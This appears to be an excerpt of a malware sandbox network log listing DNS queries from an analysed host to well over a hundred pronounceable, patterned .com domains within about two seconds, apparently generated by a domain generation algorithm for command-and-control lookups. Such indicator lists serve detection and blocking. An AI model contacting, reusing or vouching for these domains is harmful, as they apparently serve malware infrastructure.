                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027805090 CET192.168.2.81.1.1.10x2523Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.039509058 CET192.168.2.81.1.1.10xb8f5Standard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.056596041 CET192.168.2.81.1.1.10xfce7Standard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.098437071 CET192.168.2.81.1.1.10xec86Standard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.102458000 CET192.168.2.81.1.1.10x41bfStandard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.103123903 CET192.168.2.81.1.1.10x879fStandard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.103626966 CET192.168.2.81.1.1.10x1a7cStandard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.168229103 CET192.168.2.81.1.1.10x874cStandard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.168548107 CET192.168.2.81.1.1.10x751fStandard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.168690920 CET192.168.2.81.1.1.10xb471Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.195358038 CET192.168.2.81.1.1.10xebe6Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.195771933 CET192.168.2.81.1.1.10xbdf2Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.202366114 CET192.168.2.81.1.1.10x2873Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.202909946 CET192.168.2.81.1.1.10x506dStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.203015089 CET192.168.2.81.1.1.10xbabaStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.206590891 CET192.168.2.81.1.1.10x83d0Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.206823111 CET192.168.2.81.1.1.10x9107Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.206854105 CET192.168.2.81.1.1.10xd8c0Standard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.207884073 CET192.168.2.81.1.1.10x38fbStandard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.208352089 CET192.168.2.81.1.1.10x4927Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.208389044 CET192.168.2.81.1.1.10xeb15Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.208997011 CET192.168.2.81.1.1.10xab64Standard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.209126949 CET192.168.2.81.1.1.10x1a20Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.209561110 CET192.168.2.81.1.1.10x3fdbStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.210203886 CET192.168.2.81.1.1.10x77ffStandard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.210854053 CET192.168.2.81.1.1.10xd359Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.212985039 CET192.168.2.81.1.1.10x7c8dStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.214348078 CET192.168.2.81.1.1.10x4450Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.214761019 CET192.168.2.81.1.1.10x5af7Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.224765062 CET192.168.2.81.1.1.10xa645Standard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.227714062 CET192.168.2.81.1.1.10x3ffcStandard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.229443073 CET192.168.2.81.1.1.10x4a5fStandard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.231446028 CET192.168.2.81.1.1.10xc189Standard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.235937119 CET192.168.2.81.1.1.10xe5cbStandard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.238384008 CET192.168.2.81.1.1.10xaea9Standard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.242109060 CET192.168.2.81.1.1.10x24f2Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.242369890 CET192.168.2.81.1.1.10x8028Standard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.254612923 CET192.168.2.81.1.1.10xa66Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.273566008 CET192.168.2.81.1.1.10xcb03Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.275269985 CET192.168.2.81.1.1.10xec81Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.275527000 CET192.168.2.81.1.1.10xb051Standard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.278585911 CET192.168.2.81.1.1.10xa405Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.280720949 CET192.168.2.81.1.1.10xc58cStandard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.280889034 CET192.168.2.81.1.1.10xa64bStandard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.283035994 CET192.168.2.81.1.1.10x1e50Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.284190893 CET192.168.2.81.1.1.10x9623Standard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.284241915 CET192.168.2.81.1.1.10x98f6Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.284509897 CET192.168.2.81.1.1.10x520bStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.284945011 CET192.168.2.81.1.1.10x163Standard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.285365105 CET192.168.2.81.1.1.10x5ca3Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.287878990 CET192.168.2.81.1.1.10x276dStandard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.287925959 CET192.168.2.81.1.1.10x4674Standard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.291274071 CET192.168.2.81.1.1.10x574eStandard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.307961941 CET192.168.2.81.1.1.10x7d86Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.308500051 CET192.168.2.81.1.1.10xa6eaStandard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.308743954 CET192.168.2.81.1.1.10xb13dStandard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.309204102 CET192.168.2.81.1.1.10xf7bdStandard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.309413910 CET192.168.2.81.1.1.10x89dStandard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.313153982 CET192.168.2.81.1.1.10xea46Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.313231945 CET192.168.2.81.1.1.10x2a7aStandard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.313463926 CET192.168.2.81.1.1.10x80deStandard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.313644886 CET192.168.2.81.1.1.10x637bStandard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.313663960 CET192.168.2.81.1.1.10x2f60Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.314013004 CET192.168.2.81.1.1.10x9246Standard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.315480947 CET192.168.2.81.1.1.10x6895Standard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.315726995 CET192.168.2.81.1.1.10xe15dStandard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.316063881 CET192.168.2.81.1.1.10x4efbStandard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.316569090 CET192.168.2.81.1.1.10x351cStandard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.317336082 CET192.168.2.81.1.1.10x3dc1Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.317524910 CET192.168.2.81.1.1.10x4e89Standard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.317753077 CET192.168.2.81.1.1.10x8facStandard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.318161011 CET192.168.2.81.1.1.10x7511Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.318906069 CET192.168.2.81.1.1.10x8608Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.330316067 CET192.168.2.81.1.1.10xaa6dStandard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.640330076 CET192.168.2.81.1.1.10x6d06Standard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.640647888 CET192.168.2.81.1.1.10xc10fStandard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.643023968 CET192.168.2.81.1.1.10xb28Standard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.643239975 CET192.168.2.81.1.1.10xa049Standard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.644612074 CET192.168.2.81.1.1.10xa361Standard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.645376921 CET192.168.2.81.1.1.10x76ffStandard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.647378922 CET192.168.2.81.1.1.10x332eStandard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.647470951 CET192.168.2.81.1.1.10xd898Standard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.647859097 CET192.168.2.81.1.1.10x8c47Standard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.656430960 CET192.168.2.81.1.1.10xe304Standard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.656430960 CET192.168.2.81.1.1.10x7708Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.657264948 CET192.168.2.81.1.1.10x2169Standard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.657391071 CET192.168.2.81.1.1.10xeec3Standard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.657474995 CET192.168.2.81.1.1.10xda68Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.657587051 CET192.168.2.81.1.1.10x17abStandard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.657655954 CET192.168.2.81.1.1.10xc6f4Standard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.657793999 CET192.168.2.81.1.1.10x4aaaStandard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.657994032 CET192.168.2.81.1.1.10xea0cStandard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.661931992 CET192.168.2.81.1.1.10x242dStandard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.662239075 CET192.168.2.81.1.1.10x6881Standard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.673995972 CET192.168.2.81.1.1.10x8d5bStandard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.680886984 CET192.168.2.81.1.1.10x217cStandard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.682065964 CET192.168.2.81.1.1.10xa240Standard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.682533026 CET192.168.2.81.1.1.10x4cecStandard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.684160948 CET192.168.2.81.1.1.10xa801Standard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.684360027 CET192.168.2.81.1.1.10x93fbStandard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.685281038 CET192.168.2.81.1.1.10x888fStandard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.685817003 CET192.168.2.81.1.1.10xd0bbStandard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.686851978 CET192.168.2.81.1.1.10x5f13Standard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.686961889 CET192.168.2.81.1.1.10x4de6Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.687475920 CET192.168.2.81.1.1.10x7904Standard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.687794924 CET192.168.2.81.1.1.10xb85fStandard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.726706982 CET192.168.2.81.1.1.10x2e02Standard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.727174997 CET192.168.2.81.1.1.10x80ffStandard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.727731943 CET192.168.2.81.1.1.10xd385Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.728374004 CET192.168.2.81.1.1.10xc3baStandard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.729077101 CET192.168.2.81.1.1.10xbb33Standard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.730027914 CET192.168.2.81.1.1.10x17eeStandard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.730422974 CET192.168.2.81.1.1.10xa6f2Standard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.760313034 CET192.168.2.81.1.1.10xacaaStandard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.765268087 CET192.168.2.81.1.1.10x1eaaStandard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.793641090 CET192.168.2.81.1.1.10xafa6Standard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.794039965 CET192.168.2.81.1.1.10x7309Standard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.794204950 CET192.168.2.81.1.1.10xb8ebStandard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.804944038 CET192.168.2.81.1.1.10x99b5Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.805557013 CET192.168.2.81.1.1.10xefb3Standard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.805808067 CET192.168.2.81.1.1.10x2acaStandard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.806073904 CET192.168.2.81.1.1.10xf11eStandard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.806410074 CET192.168.2.81.1.1.10x2e6cStandard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.806772947 CET192.168.2.81.1.1.10x63c6Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.807075024 CET192.168.2.81.1.1.10x13feStandard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.807271004 CET192.168.2.81.1.1.10xd14eStandard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.807452917 CET192.168.2.81.1.1.10xb6b7Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.809773922 CET192.168.2.81.1.1.10x1e25Standard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.810039997 CET192.168.2.81.1.1.10x827aStandard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.810240030 CET192.168.2.81.1.1.10x1ce4Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.814449072 CET192.168.2.81.1.1.10x9780Standard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.814830065 CET192.168.2.81.1.1.10x32b8Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.815361023 CET192.168.2.81.1.1.10xbfa9Standard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.815429926 CET192.168.2.81.1.1.10xe677Standard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.817702055 CET192.168.2.81.1.1.10x3f2fStandard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.817842960 CET192.168.2.81.1.1.10xfcf1Standard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.818052053 CET192.168.2.81.1.1.10x8e5Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:19.818636894 CET192.168.2.81.1.1.10xf84dStandard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.238534927 CET192.168.2.81.1.1.10x1d83Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.239074945 CET192.168.2.81.1.1.10x6b7dStandard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.241022110 CET192.168.2.81.1.1.10xd376Standard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.241902113 CET192.168.2.81.1.1.10xbf64Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.243402958 CET192.168.2.81.1.1.10xcd4aStandard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.244079113 CET192.168.2.81.1.1.10xca7bStandard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.246175051 CET192.168.2.81.1.1.10xc8f4Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.262480021 CET192.168.2.81.1.1.10x47bdStandard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.262753010 CET192.168.2.81.1.1.10xa18aStandard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.263509035 CET192.168.2.81.1.1.10xbbe2Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.275811911 CET192.168.2.81.1.1.10x48aStandard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.276082039 CET192.168.2.81.1.1.10x53cfStandard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.276341915 CET192.168.2.81.1.1.10x44f5Standard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.277858973 CET192.168.2.81.1.1.10x4579Standard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.297818899 CET192.168.2.81.1.1.10x803dStandard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.298604965 CET192.168.2.81.1.1.10xc9c9Standard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.301402092 CET192.168.2.81.1.1.10xfc87Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.324311972 CET192.168.2.81.1.1.10x691cStandard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.324616909 CET192.168.2.81.1.1.10xeb0aStandard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.324670076 CET192.168.2.81.1.1.10x3746Standard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.325345039 CET192.168.2.81.1.1.10xd62bStandard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.325408936 CET192.168.2.81.1.1.10xba9fStandard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.325953960 CET192.168.2.81.1.1.10x73e8Standard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.326251984 CET192.168.2.81.1.1.10x27b6Standard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.326467991 CET192.168.2.81.1.1.10x3dadStandard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.327253103 CET192.168.2.81.1.1.10x97beStandard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.327642918 CET192.168.2.81.1.1.10x825Standard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.327945948 CET192.168.2.81.1.1.10xb2a1Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.328151941 CET192.168.2.81.1.1.10x92e2Standard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.328533888 CET192.168.2.81.1.1.10x7cbStandard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.328753948 CET192.168.2.81.1.1.10xf68dStandard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.329123974 CET192.168.2.81.1.1.10x56b4Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.329596996 CET192.168.2.81.1.1.10xa220Standard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.329794884 CET192.168.2.81.1.1.10x9509Standard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.330245018 CET192.168.2.81.1.1.10xe803Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.340181112 CET192.168.2.81.1.1.10x3d4aStandard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.341378927 CET192.168.2.81.1.1.10x3d2Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.341474056 CET192.168.2.81.1.1.10xf838Standard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.345406055 CET192.168.2.81.1.1.10x7958Standard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.347930908 CET192.168.2.81.1.1.10xb891Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.348114967 CET192.168.2.81.1.1.10x121cStandard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.371870995 CET192.168.2.81.1.1.10xfe60Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.371990919 CET192.168.2.81.1.1.10x66eStandard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.372078896 CET192.168.2.81.1.1.10xdb83Standard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.372275114 CET192.168.2.81.1.1.10x929fStandard query (0)qexylal.comA (IP address)IN (0x0001)false
